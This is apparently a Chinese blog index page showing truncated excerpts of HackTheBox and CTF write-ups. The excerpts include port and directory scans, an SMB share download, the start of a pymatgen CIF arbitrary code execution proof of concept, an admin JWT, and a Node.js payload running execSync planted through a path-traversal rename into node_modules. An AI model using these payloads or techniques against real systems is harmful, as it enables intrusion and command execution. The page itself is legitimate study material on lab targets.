写在之前Season7 开始了。这个靶机提供了两个服务rose / KxEPkKe6R8su 这个靶机上来被 xp_cmdshell 非预期了，过了挺长时间才找到一份解决了的 Wp，这里学习下。 不懂为什么是 EZ、感觉和之前那个 Infiltrator 一个难度。 信息收集123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778nmap -sV -sC -O 10.10.11.51Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 23:26 CSTNmap scan report for 10.10.11.51Host is up (0.16s latency).Not shown: 988 filtered tcp ports (no-response)PORT STATE S ...

信息搜集12./fscan -h 10.10.11.38 -p 1-65535 5000有web服务 5000 Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string 按照上面的漏洞链接创建 poc 文件： 12345678910111213data_5yOhtAoR_audit_creation_date 2018-06-08_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"loop__parent_propagation_vector.id_parent_propagation_vector.kxkykzk1 [0 0 0]_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ( ...

有事情来着，所以没及时做完。 信息搜集12345678start infoscan10.10.11.37:80 open10.10.11.37:22 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.37 code:301 len:304 title:301 Moved Permanently 跳转url: http://instant.htb/[*] WebTitle http://instant.htb/ code:200 len:16379 title:Instant Wallet android 逆向通过获取到的官网的 apk 可以获取到 api： 1http://mywalletv1.instant.htb/api/v1/view/profile 后面还提供了一个 Auth： 1eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVj ...

额，不太懂这个靶机为什么这么这么的卡。suid 利用的不太会。 信息搜集12345678start infoscan10.10.11.36:22 open10.10.11.36:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.36 code:302 len:0 title:None 跳转url: http://yummy.htb/已完成 2/2[*] 扫描结束,耗时: 51.404375599s 扫下目录： 1234567891011121314151617gobuster dir -u http://yummy.htb/ -w /usr/share/wordlists/dirb/common.txt===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@f ...

ezRender Hint: ulimit -n =2048 cat /etc/timezone : UTC ulimit 特性源码 User.py中的写法刚开始给我看一愣，主要是 handler 和 setSecret 这两部分到底是什么意思。handler 打开/dev/random的句柄，setSecret 获取开头的 22 个字节，然后 hex 。 123456789101112131415161718192021import timeclass User(): def __init__(self,name,password): self.name=name self.pwd = password self.Registertime=str(time.time())[0:10] self.handle=None self.secret=self.setSecret() def handler(self): self.handle = open(&quo ...

信息搜集12345678910start infoscan10.10.11.35:445 open10.10.11.35:135 open10.10.11.35:139 open10.10.11.35:88 open[*] alive ports len is: 4start vulscan已完成 4/4[*] 扫描结束,耗时: 7.961433112s host 加一下。 USERsmb 信息泄露注意到 445，尝试 smbclient 连接一下，先看下目录。 1smbclient -L 10.10.11.35 其中的 HR 可以连接并获取目录，其他的没有读取权限。 注意这里下载是用 get 命令。 1get "Notice from HR.txt" 本地浏览下： 1234567891011121314151617181920212223Dear new hire!Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security ...

First of all你们赢了，不仅突了我的脸，还给我举报 ban 了。但是无所谓，反正我也是打着玩。分不分的都无所谓，我就愿意发 wp。不像某些人当婊子还想立牌坊。 信息搜集123456start infoscan10.10.11.34:22 open10.10.11.34:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://10.10.11.34 code:301 len:306 title:301 Moved Permanently 跳转url: http://trickster.htb 添加 host 之后扫一下。 扫描子域名1gobuster vhost -u http://trickster.htb --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r 添加 host 给 shop 子域名。 扫描文件目录，这里的-b排除掉 403 ...

信息搜集12345610.10.11.33:22 open10.10.11.33:80 open10.10.11.33:8080 open[*] alive ports len is: 3start vulscan[*] WebTitle http://10.10.11.33 code:301 len:0 title:None 跳转url: http://caption.htb[*] WebTitle http://10.10.11.33:8080 code:200 len:7191 title:GitBucket 8080 GitBucket exploits/GitBucket/gitbucket-unauthenticated-rce.md at master · kacperszurek/exploits 发现有目录：http://caption.htb:8080/、http://caption.htb:8080/root后者直接跳转到 root 用户，但是仍然需要验证。 http://caption.htb:8 ...

前言分数实在是难以启齿。终于想起来要复现这个了，就找到了不是 java 的部分 wp，后面的要是找到了再补充吧。 ezjs 谈Express engine处理引擎的一个trick 测试服务跑起本地服务 1node app.js break原理比如a.natro这个文件在被 render() 时，他就会自动执行 require natro 。 详细可以阅读引用文章。 测试我们在 node_modules 下想办法上传一个natro文件夹，然后添加进 index.js。这里的rename方法正好就可以做到。首先我们上传一个 index.js 文件，然后 rename 路径穿越到 node_modules 下面。 因此我们通过此方法，将其他后缀文件解析成需要的 ejs 格式。 首先我们需要上传上去 index.js 123exports.__express = function() { console.log(require('child_process').execSync('whoami').toString());}; ...